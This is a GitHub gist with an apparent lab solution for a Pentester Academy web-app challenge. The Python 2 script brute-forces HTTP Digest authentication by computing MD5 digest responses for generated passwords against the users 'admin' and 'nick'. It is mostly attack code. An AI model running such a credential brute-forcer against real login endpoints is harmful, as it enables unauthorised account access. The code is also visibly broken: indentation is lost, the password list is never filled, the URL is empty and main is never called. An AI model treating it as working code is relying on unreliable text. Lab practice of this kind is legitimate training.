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Last active December 23, 2015 13:19
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Save yesecurity/6641592 to your computer and use it in GitHub Desktop.
SecurityTube WAP_Challenge 6
from threading import Thread
from httplib2 import Http
import sys
import requests
import md5
import itertools
url = ""
listp = []
#Creating Password List
a = list(itertools.product(['x','y','z'], repeat = 5))
for e in a:
a = ''.join(e)
def brute(user):
for p in listp :
zero = Http()
# The client sends the server a request .
r = requests.get(url)
#The server responds by returning an 401 "Unauthorized" response code which include WWW-Authenticate header .
b = r.headers.get('www-authenticate', '')
g =b.split(" ")[3].split("nonce=")[1]
nonce = g[1:-1]
method = "GET"
digestURI = "/lab/webapp/digest2/1"
realm = "Pentester Academy"
#Compute hash1 = MD5("username:realm:password")
h1 = (user+":"+realm+":"+p)
ha1 = (md5.md5(h1).hexdigest())
#Compute hash2 = MD5("method:digestURI")
h2 = (method+":"+digestURI)
ha2 = (md5.md5(h2).hexdigest())
#Compute hash3 (response) = MD5("ha1:nonce:ha2").
resp = (ha1+":"+nonce+":"+ha2)
response = (md5.md5(resp).hexdigest())
#The client sends the response back to the server in an Authorization header and includes
#the username, realm, nonce,digestUri and the computed response
bal = {"Authorization" : 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s" ' % (user, realm, nonce, digestURI, response)}
resp , b = zero.request(url,"GET" ,"",bal)
b = resp['status']
if b != "401":
print "Big Thanks To Pentester Academy !"
print "User = " + user
print "Password = " + p
def main():
users = ['admin' , 'nick']
for us in users:
user = us
Thread(target = brute , args = (user,)).start()
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